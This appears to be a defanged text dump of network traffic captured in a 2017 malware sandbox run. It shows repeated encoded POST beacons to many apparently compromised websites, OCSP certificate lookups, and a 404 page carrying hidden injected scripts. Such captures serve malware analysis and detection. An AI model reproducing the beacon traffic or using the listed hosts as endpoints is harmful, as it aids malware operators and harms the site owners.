ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z...

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: __cfduid=da68f6544f316bb0b72405d74d8c043cf1498907818
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.naijagurus.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 02 Dec 2016 11:20:39 GMT
Server: cloudflare-nginx
CF-RAY: 3778f4c934a5822b-KBP
f55..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb"&g
t;.<head> <meta http-equiv="content-type" content="text/html;
charset=utf-8" /> <meta name="robots" content="index, follow" /
> <meta name="keywords" content="naija, gurus, naija gurus, lago
s, nigeria, ola white, ola white y, africa, entertainment, info tech"
/> <meta name="description" content="Naija Gurus - Information a
nd Entertainment Professionals - Encouraging - Promoting - Celebrating
the Gurus of our Land" /> <meta name="generator" content="Jooml
a! 1.5 - Open Source Content Management" /> <title>Naija Guru
s - Info Tech & Entertainment Professionals</title> <link
href="favicon.ico" rel="shortcut icon" type="image/x-icon" /> <
link rel="stylesheet" href="jv.moomenu.css" type="text/css" /> <
link rel="stylesheet" href="jvlatestnews.css" type="text/css" /> &l
t;link rel="stylesheet" href="proshow.css" type="text/css" />.<l
ink rel="stylesheet" href="system.css" type="text/css" />.<link
rel="stylesheet" href="general.css" type="text/css" /> <link rel
="stylesheet" href="default.css" type="text/css" /> <link rel="s
tylesheet" href="template.css" type="text/css" /> <link rel="sty
lesheet" href="typo.css" type="text/css" />.</head>.<body
id="bd" class="fs3 ">.<div id="jv-wrapper">.<div id="j

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache

FTysBOYZLV7EI4cxgeiAhAnotPzGbaYBeiyZCLZyAoU70/S6zcDK54GMcAHxoJCtjho1VU77UQ85/AFzY9kyEQWlszcdMjHhsFdJyWSs oN/Cae6jxN9PSb22ngn5Vy1FI7HC/R2y6mYkayZoboS4Foy5ioNzkcxK75mfIxeYIRNOOLdl8zRzl9PjwpyLiwsojen0AH96UqSsmJCWbUwRSnqk2nBDjp4DI8z24 BddOnl0Op3/PRCZABXxCOctf25puKMDo/o7wDga7/1cHdC3hcS A4X0om3Z6K3rDFYhye5sMiMt6t4EjNzAAi8od6w3RIi2Y0bLlqtEmGODHQUndAGIKYqm3Hpx2xgMy3mODLYPVhqmvmm38GiO5ml7HcqRoBgp6y0 M yjt7BQ8N1Kivs2B/h8skxvBEdopkznmH5UNp5DlGE97G4byD4IF75qqFr8KIaaX5V/BBUoO/CQKPjdVJqzV2xgMTr DezR7Dm7x6FEyqE7KjgszTQkO8jrbCGnI=
HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
Location: hXXp://iaiglobal.or.id/v03/
Content-type: text/html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
....



GET /v03/ HTTP/1.1

Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
location: home
Content-type: text/html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
....



GET /v03/home HTTP/1.1

Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:39 GMT
Server: Apache
Set-Cookie: PHPSESSID=2d847d056d63a23e25080919182c7c83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
1f99..<!DOCTYPE html>.<html lang="en">.<head>..<s
cript>. (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r
]=i[r]||function(){. (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*ne
w Date();a=s.createElement(o),. m=s.getElementsByTagName(o)[0];a.asyn
c=1;a.src=g;m.parentNode.insertBefore(a,m). })(window,document,'scrip
t','hXXps://VVV.google-analytics.com/analytics.js','ga');.. ga('creat
e', 'UA-93679917-1', 'auto');. ga('send', 'pageview');..</script&g
t;. <meta charset="utf-8">. <meta name="viewport" conte
nt="width=device-width, initial-scale=1.0">. <meta name="desc
ription" content="">. <meta name="author" content="">.
<link rel="icon" type="image/png" href="hXXp://iaiglobal.or.id/v03/
templates/template_iai/img/icons/icon IAI.png"/>.. <title&g
t;Ikatan Akuntan Indonesia (IAI))</title>.. <!-- Bootstrap
Core CSS -->. <link href="templates/template_iai/css/bootstr
ap.min.css" rel="stylesheet" type="text/css">.. <link href="t
emplates/template_iai/font-awesome/css/font-awesome.min.css" rel="styl
esheet" type="text/css">..<link href="templates/template_iai/css
/animate.css" rel="stylesheet" />. <link href="templates/temp
late_iai/css/style.css" rel="stylesheet">..<link href="templates
/template_iai/color/default.css" rel="stylesheet">..<link href='
hXXp://fonts.googleapis.com/css?family=Roboto:400,100,300,500,700,900,
100italic,300italic,400italic,700italic,900italic|Roboto Condensed

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: theprintinghouseltd.co.uk
Connection: Keep-Alive
Cache-Control: no-cache

d46cIp8SD2n0384b/j8lZSiavGh1a6SOQ/x3KvlKXs4Xrt8WemU8kWukayIYATjcvDi62tEEmI9YADOO6MDuJaTpz ZXpYM1ymRa98DgvBzSZ/uhlR7HESSFjewMkIiqGP8nFOHkf2Kqss5ait4vBo/xYT5ZlrsfIay Y6JVRgdd8TK07dhoDIY0QAkldKPxYPLgGd2cj FMIc3t2k5JCSQ1rDS33PwmMtqhOuHramoZuYUpdqilVjjU4p1otI07b7F8CjYSVWNEtt 7dFCfjpiJuExtySBnhy1dzMyr8xsV1M2jZ1somvumMrC2WQnBu6DUWBy73KozK7icWGiYm4C1kUdOoP9B4xeJ 1abNKu THnSzIVUP9uD1Y935yKw6Z537/euyiu9jr9vaXZJ/FBQWo ohkl/JLVjNzdAloh/tBcZz8AUvybRmZwYROl1n0Q7xM2UpJKLidgJ1NCw2IekZgWQP7DMDw==
HTTP/1.1 301 Moved Permanently
Location: hXXp://VVV.theprintinghouseltd.co.uk/
Server: Microsoft-IIS/7.5
Date: Sat, 01 Jul 2017 11:16:52 GMT
Content-Length: 0
HTTP/1.1 301 Moved Permanently..Location: hXXp://VVV.theprintinghousel
td.co.uk/..Server: Microsoft-IIS/7.5..Date: Sat, 01 Jul 2017 11:16:52
GMT..Content-Length: 0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: nichedictionary.com
Connection: Keep-Alive
Cache-Control: no-cache

cL2fl4QQHYxrOnnun2Jhi1eCT7G80wBz G26s5Rp3aeyO Q6nTY0L3e3FutvrG0KcvMJ6ee86uPtUG0ABSQ6PwIElsyrzRlaxlqRgSKiEzo7emRdzkMWgde7F6FrZcj1r0BGl606RxS/qgfIdSvwBYRIrfdtrNzUmL5wnGrvVzpm9g9yx5vhqG3I9TcwOrYt7Q5kYp3Sj5xx6YMuIxZ0t4veVsygTxDUWHGDHVdryQaKg14wixmQBd3CCfPJluQry5DcZnxg6nHtjJRhMsT6is WwWQJ9Q BjxX8BDGtWUCGuhu/izErOsgaRlwXFVB6GkdpBdMZd3pUn4dHlf1bO8wbnMLJnbvvP1tPchOOen7riz/Nmpdqv/V72hAY9gvGUDwXyaPUry4iPrC/CSbNuBvoSurNTvCryIkHgAo2dzxvcxZOZLHU 691x5ST6nPWYhTExFz7uu54M3I6ZJKvITARh5teKOyMmxohkeDdXnIlwRAT5mKTrFBDQSOGkIj4yT07QKp49zIrYKheJ7pa I3w
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:12:07 GMT
Server: Apache/1.3.42 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8y
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
1  .."..0..HTTP/1.1 403 Forbidden..Date: Sat, 01 Jul 2017 11:12:07 GMT
..Server: Apache/1.3.42 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl
/2.8.31 OpenSSL/0.9.8y..Keep-Alive: timeout=15, max=99..Connection: Ke
ep-Alive..Transfer-Encoding: chunked..Content-Type: text/html; charset
=iso-8859-1..1 .."..0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 448
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: niray.com.cn
Connection: Keep-Alive
Cache-Control: no-cache

mF SBC9OrnSj1v7kTqUGPziowkVFJrX206B3pR4BTiLQvPucfUoWSsmRmUk KPm3UTv4dMadGKysn 67wxjwETQ/boNBizCDxFmzQfedyZshUVrcvgq2L8TE/M8KK5MKxKrxQYAs4llhUa3gfd4SUO2NDiBJDrIYVY/Fp9azHScoGCG6Us7zdCuJ6pbnNkkANBc1dd8/SKxSOuKgbgkfMCMxp0PDWLiTd/cZcRW4ZWmxAosbosjmHP7Weq4yPJFYy9YA3V8LcUQ9EZzNH6TWryXRNI6rwIDT7RxrsDHj KNlRXfR506CUxb5UgoyRKkQ72VpMt0bfzftwbAcmaMmwNr88Sg1VTVT8Tej T4jL176yXTcf9gkvtNFjK8y8MFHFUK8P35fjiZShepTepuVfITH0 9oF5og 55XBnYYLK5CH0vyQaHkeGYlRUK62g==
HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 01 Jul 2017 11:17:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Status: 404 Not Found
Content-type: text/html
...<html>..<head>..<meta charset="utf-8">..<title
>404 Not Found</title>..<div style="display:none"> ..&l
t;script language="javascript" type="text/javascript" src="//js.users.
51.la/19178304.js"></script>..<script>..var _hmt = _hmt
|| [];..(function() {.. var hm = document.createElement("script");..
hm.src = "hXXps://hm.baidu.com/hm.js?d04cb65f0529555a240b2d4928aa510
0";.. var s = document.getElementsByTagName("script")[0]; .. s.paren
tNode.insertBefore(hm, s);..})();..</script>..<script languag
e="javascript" type="text/javascript" src="hXXp://seo.seseapp.site:878
8/old/tz.js"></script>..</div> ..</head>..<bod
y>..<div class="ts1">..<h1>404 Not Found</h1>..&l
t;/div>..<div class="ts2">..<div class="ts2_t">..<p&
gt;The requested URL was not found on this server.</p>..<p>
;..............................</p>..<p>..................
...................................................qq...............&l
t;/p>..<!--QQ:1415864755-->..</div>..</div>..<
/body>..</html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: eleterno.com
Connection: Keep-Alive
Cache-Control: no-cache

uulA2fNQsnzK ctDOuF4hZzvRjhZ gqP19XfADWVv8 FX0Lux9AyyvrLe1d4FBDRRM7yDmx9mB62FKKiQogpgWg47paLvV4EfnbwLuwEz98WESngL0WlnaujlqSJVQ6qgNR6kuP8XPkIhKhaeipewkad85RPUesllAUSWRY7T901sHMPkwwl4xUl0V8fOus/zVVPYyQPOvCsQ/VpcADLflH9XwFgyXYJZM6SwYyC5GxkOUIk7ETgDPyxQQ4THWNv7xT7PlqGevzff1aeq/MvnABeHXlIA25YSOqiCMZ/uCXlala6WUNaAbVTWgD4lq2PTDTO1D0rpWe1X4SqOki2j 8UJOp7lt5AevuUUriGokecMa3Wu0leVbFgSci91F6ffH/SKqH0C1LLxjFiVCFOAqM EqvZMGZYRvQNpVBr eL emLogCQTllA12KwYs3vEKcRcmOivkEVA7U1cyheVZom5PCgbT93jR0vX
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:15 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Tue, 13 Jun 2017 18:59:03 GMT
ETag: "e320b9-8a-551dc07702bc0"
Accept-Ranges: bytes
Content-Length: 138
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!doctype html>.<html>.<head>.<meta charset="utf-
8">.<title>en construccion...</title>.</head>..&l
t;body>.en construccion....</body>.</html>.HTTP/1.1 200
OK..Date: Sat, 01 Jul 2017 11:17:15 GMT..Server: Apache/2.2.31 (Unix)
mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4..Last-Modified:
Tue, 13 Jun 2017 18:59:03 GMT..ETag: "e320b9-8a-551dc07702bc0"..Accept
-Ranges: bytes..Content-Length: 138..Keep-Alive: timeout=5, max=100..C
onnection: Keep-Alive..Content-Type: text/html..<!doctype html>.
<html>.<head>.<meta charset="utf-8">.<title>en
construccion...</title>.</head>..<body>.en construc
cion....</body>.</html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: shs-sales.co.uk
Connection: Keep-Alive
Cache-Control: no-cache

xDIfQ2ryhJCclttKTX4fOC1LYgOaWuC2PuMey5XnheIkYXvp3UE9jTp5KQmlnEXnl783xJeue0iA84ZFW2M3RnrF/GWW4e/NP8iZeQE4ze9b4M5mUoKFlNcVVukHnTyYeC27NWYxI13KFYPdlIJqFWg2XRBFAHTuDpqfs38N0Mc9evZs2UCAs5ppTLhUujbA4KqzWBWQleHzrpP8ZQAHT3kZHMNptgE/0nDxM0NG85Bnuy49UeBIhSvYgXkwZUWWlOag0gO B8i5Njcu8OWOhQ88UE2Hlmt3Va1BeMsyDg/X2YLATZu89w0IHVvXHZykTLuYAALUXVCF4OMaAZkHpCEJtI80Xt4pz5/YRd19GkOdKHqSpcBLSpojWb2Mq5jWfmzdu1aUs0T2pRfPKQrJ9qBorIZ9YlEP59kdNoO8YgojvgF4taeWpgXrFIRzFvTMrzsHqGq1ifQuiZgZlWAFDwig8KHlxrxF0KrOpEjUMuFynbVZzPaC3x8LWlT66c/VEZkQAjBbUHR2sjk=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=91afadcf90a7c7716b8979766ad65147; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
1fc2..<!DOCTYPE html>.<html lang="en">.<head>.<me
ta charset="utf-8">.<title>SHS Sales & Marketing UK - Leading
UK Sales & Marketing Company</title>.<meta name="description
" content="SHS Sales & Marketing UK - Leading UK Sales & Marketing Com
pany" />.<meta name="author" content="Creative Online Media" /&g
t;.<meta name="viewport" content="width=device-width, initial-scale
=1.0" />..<link href="/assets/images/favicon.ico" rel="shortcut
icon" />.<link href="/assets/css/mainstyle.css" rel="stylesheet"
type="text/css" media="screen, projection" />.<link href="/asse
ts/css/print.css" rel="stylesheet" type="text/css" media="print" />
.<link href="/assets/images/favicon.ico" rel="shortcut icon" />.
<link href="/assets/images/touch-icon-iphone.png" rel="apple-touch-
icon" />.<link href="/assets/images/touch-icon-ipad.png" sizes="
72x72" rel="apple-touch-icon" />.<link href="/assets/images/touc
h-icon-iphone-retina.png" sizes="114x114" rel="apple-touch-icon" />
.<link href="/assets/images/touch-icon-ipad-retina.png" sizes="144x
144" rel="apple-touch-icon" />..<!--[if lt IE 9]>.<link hr
ef="/assets/css/ie.css" rel="stylesheet" type="text/css" />.<![e
ndif]-->..<script type="text/javascript" src="/assets/js/jquery.
js"></script>.<script type="text/javascript" src="/assets
/js/jquery.cycle2.js"></script>.<script type="text/javascr
ipt" src="/assets/js/jquery.cycle2.carousel.js"></script>

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: PHPSESSID=j7kgovsp5k90k74s1jf0lua073
Host: itgsolutions.nl
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:17:29 GMT
Server: Apache
Location: hXXps://itgsolutions.nl/
Content-Length: 232
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXps://itgsolutions.nl/">here</a&
gt;.</p>.</body></html>.HTTP/1.1 301 Moved Permanent
ly..Date: Sat, 01 Jul 2017 11:17:29 GMT..Server: Apache..Location: htt
ps://itgsolutions.nl/..Content-Length: 232..Keep-Alive: timeout=5, max
=100..Connection: Keep-Alive..Content-Type: text/html; charset=iso-885
9-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
/head><body>.<h1>Moved Permanently</h1>.<p>
The document has moved <a href="hXXps://itgsolutions.nl/">here&l
t;/a>.</p>.</body></html>...


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEBaH1oht4jAGhSM9vxG/ZZc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: t2.symcb.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1504
content-transfer-encoding: binary
Cache-Control: max-age=417758, public, no-transform, must-revalidate
Last-Modified: Thu, 29 Jun 2017 07:19:00 GMT
Expires: Thu, 6 Jul 2017 07:19:00 GMT
Date: Sat, 01 Jul 2017 11:16:55 GMT
Connection: keep-alive
0..........0..... .....0......0...0.........@e!.t.....4...,.#..2017062
9071900Z0s0q0I0... ........0..k....&..p..^.X.....{[E....z.1..j..F.WHP.
.....m.0..#=...e.....20170629071900Z....20170706071900Z0...*.H........
.....$%..AA..pT.U.:D..r/........o....fg..R....3.........A.............
7....'1..;...~....e...Qj........h.`...v......A..O......J..q..I.q}.I..r
UN......IO.WR....E.W.?i....H..G.rP9&...Gq.....x.#.a...5.......7..}.A..
.W.J.....C.j.g....v5.B}P.....E......-.H.].8.......Y....0...0...0......
....j!.....&.....t.T0...*.H........0..1.0...U....US1.0...U....thawte,
Inc.1(0&..U....Certification Services Division1806..U.../(c) 2006 thaw
te, Inc. - For authorized use only1.0...U....thawte Primary Root CA0..
.161122000000Z..171214235959Z0_1.0...U....US1.0...U....thawte, Inc.190
7..U...0thawte Primary Root OCSP Responder Certificate 50.."0...*.H...
..........0..........s..O..W>.....2......n..z...U.......i..Ie...].O
..._.{q.`;..........C.S.....W.1.....|.Y}....2..s.H..q....*z:|2..]...F.
j.....jq...#.."[.9..4-k...r....Y.?......f.K.......73...v.].......y....
N_......0.b..:.a...'G..".(.x...;8d#>j.}......j..Bu....3.@..h...Z...
.......j0h0...U.%..0... .......0... .....0......0...U.......0.0...U...
........0"..U....0...0.1.0...U....TGV-OFF-510...*.H.............1.....
..9...4...;.xC%:W.J.....c...o..J.E.]%{j......^).~..qX.....iK..1vv....R
._....&.O.%.(.|........S;5. ..A.&....)....D*uwKz1..V.....n....>...a
..|......W..1:....Rl..s/.......\n.e...%E.. ...G.PIP.$.8.p.."...$?e....
..\...u.;...-......D".|h...>6rO. ......Hd~...

<<< skipped >>>

GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSTufqHinruS/P9Wi1XSjRRzoTLfAQUfgNaZUFrp34K4bidCOodjh1qx2UCEQDz2s8xoGAsSX7X4SgWqX81 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.comodoca.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:14 GMT
Server: Apache
Last-Modified: Fri, 30 Jun 2017 07:26:47 GMT
Expires: Fri, 07 Jul 2017 07:26:47 GMT
ETag: 3EB3DD7C78B7E47A470A9C90C0EBA44EAD59F834
Cache-Control: max-age=503972,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp32
Content-Length: 472
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0......~.ZeAk.~.........j.e..2017063
0072647Z0t0r0J0... .............z.K..Z-WJ4Q...|..~.ZeAk.~.........j.e.
.....1.`,I~..(...5....20170630072647Z....20170707072647Z0...*.H.......
......k[f.p6..`..3.$.Qm.......r.t..o.....lLg .`x.........0.*......qf.F
..\.G&.@..s....Jn.O8..o../B..;.Cg..o.U)mI.y..z...J.2...a..2.G. ...'..2
..9.B.2K%....F.t.LK.D...,Ru4{9sLg.........6...,....a...5i..\..../.\...
..O..~].....a..Q.T...w...z.`P.aD .e....H..>..}.!@.....


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:11:09 GMT
Content-transfer-encoding: Binary
last-modified: Sat, 01 Jul 2017 09:53:09 GMT
ETag: "5333f42ef0dbf21af9be65fd8a0780b588e54a64"
expires: Sun, 02 Jul 2017 09:53:09 GMT
cache-control: max-age=43200,public,no-transform,must-revalidate
Content-Type: application/ocsp-response
Content-Length: 1398
0..r......k0..g.. .....0.....X0..T0........ ..zJ.!.I...u(......2017070
1095309Z0s0q0I0... ........o.hMC..Hb... =G,../.......{,q...K.u...`....
...AB...S.sj.........20170701095309Z....20170702095309Z0...*.H........
......;e.........0...v.....I.2..Oj....v.B. C...'..kC9.s....~....F|..P8
....i.. .`..u.B...%tT..H.1.@0.....9..m....[}-K/...pt .uk.P..y@....)..P
....<.....o@K..qS...^2....r.].T.<...I/.`.%d.L/..>3_......|.7.
h...@....d..t@.vH.%..2.eq..I....v..E..........'.).'.u~F.........0...0.
..0..{.........AB...[.s^*(R.40...*.H........0?1$0"..U....Digital Signa
ture Trust Co.1.0...U....DST Root CA X30...170510174115Z..180510174115
Z0..1.0...U....US1 0...U....Digital Signature Trust1.0...U....DST1.0..
.U....DST CA X3 OCSP Signer1$0"..*.H........pki-ops@IdenTrust.com0.."0
...*.H.............0.........C#......}.>.....r....P..%b.b....mh...O
....c.?..1_...O....9.K.6I.#O..6\..`..`~.5..&.!y....;..Y.Fcob.}....nz..
V.......F...{.2.4....AIt........s..lgQ..v...P7....)dk..`...../{..^N...
%-../-.z.|w.9..TFw.(...g....K=6..xr.B9..d{..Lf......T....t.........1ne
.7.t.........F0D0...U.......0.0...U...........0... .....0......0...U.%
..0... .......0...*.H..............p.A....o.....L.c.J.-5.h.nbE.r0\...)
3}..e.Lo.U.......&......l....$...........I...BI..Y.#..y(<h.?....i7.
..d...'k..A....H.$.6BP.*.o..\..`rh....oR.#..._}_.F.V..j..v>.}=Z.I..
O...QOr3.b.3.2.~ht./2t#d..M.}.?..T...$=....C...h....7F....2..]....'.P.
........M.@>.;.W
....

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg= HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:11:09 GMT
Content-transfer-encoding: Binary
last-modified: Sat, 01 Jul 2017 09:53:09 GMT
ETag: "5333f42ef0dbf21af9be65fd8a0780b588e54a64"
expires: Sun, 02 Jul 2017 09:53:09 GMT
cache-control: max-age=43200,public,no-transform,must-revalidate
Content-Type: application/ocsp-response
Content-Length: 1398
0..r......k0..g.. .....0.....X0..T0........ ..zJ.!.I...u(......2017070
1095309Z0s0q0I0... ........o.hMC..Hb... =G,../.......{,q...K.u...`....
...AB...S.sj.........20170701095309Z....20170702095309Z0...*.H........
......;e.........0...v.....I.2..Oj....v.B. C...'..kC9.s....~....F|..P8
....i.. .`..u.B...%tT..H.1.@0.....9..m....[}-K/...pt .uk.P..y@....)..P
....<.....o@K..qS...^2....r.].T.<...I/.`.%d.L/..>3_......|.7.
h...@....d..t@.vH.%..2.eq..I....v..E..........'.).'.u~F.........0...0.
..0..{.........AB...[.s^*(R.40...*.H........0?1$0"..U....Digital Signa
ture Trust Co.1.0...U....DST Root CA X30...170510174115Z..180510174115
Z0..1.0...U....US1 0...U....Digital Signature Trust1.0...U....DST1.0..
.U....DST CA X3 OCSP Signer1$0"..*.H........pki-ops@IdenTrust.com0.."0
...*.H.............0.........C#......}.>.....r....P..%b.b....mh...O
....c.?..1_...O....9.K.6I.#O..6\..`..`~.5..&.!y....;..Y.Fcob.}....nz..
V.......F...{.2.4....AIt........s..lgQ..v...P7....)dk..`...../{..^N...
%-../-.z.|w.9..TFw.(...g....K=6..xr.B9..d{..Lf......T....t.........1ne
.7.t.........F0D0...U.......0.0...U...........0... .....0......0...U.%
..0... .......0...*.H..............p.A....o.....L.c.J.-5.h.nbE.r0\...)
3}..e.Lo.U.......&......l....$...........I...BI..Y.#..y(<h.?....i7.
..d...'k..A....H.$.6BP.*.o..\..`rh....oR.#..._}_.F.V..j..v>.}=Z.I..
O...QOr3.b.3.2.~ht./2t#d..M.}.?..T...$=....C...h....7F....2..]....'.P.
........M.@>.;.W
....

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg= HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:11:09 GMT
Content-transfer-encoding: Binary
last-modified: Sat, 01 Jul 2017 09:53:09 GMT
ETag: "5333f42ef0dbf21af9be65fd8a0780b588e54a64"
expires: Sun, 02 Jul 2017 09:53:09 GMT
cache-control: max-age=43200,public,no-transform,must-revalidate
Content-Type: application/ocsp-response
Content-Length: 1398
0..r......k0..g.. .....0.....X0..T0........ ..zJ.!.I...u(......2017070
1095309Z0s0q0I0... ........o.hMC..Hb... =G,../.......{,q...K.u...`....
...AB...S.sj.........20170701095309Z....20170702095309Z0...*.H........
......;e.........0...v.....I.2..Oj....v.B. C...'..kC9.s....~....F|..P8
....i.. .`..u.B...%tT..H.1.@0.....9..m....[}-K/...pt .uk.P..y@....)..P
....<.....o@K..qS...^2....r.].T.<...I/.`.%d.L/..>3_......|.7.
h...@....d..t@.vH.%..2.eq..I....v..E..........'.).'.u~F.........0...0.
..0..{.........AB...[.s^*(R.40...*.H........0?1$0"..U....Digital Signa
ture Trust Co.1.0...U....DST Root CA X30...170510174115Z..180510174115
Z0..1.0...U....US1 0...U....Digital Signature Trust1.0...U....DST1.0..
.U....DST CA X3 OCSP Signer1$0"..*.H........pki-ops@IdenTrust.com0.."0
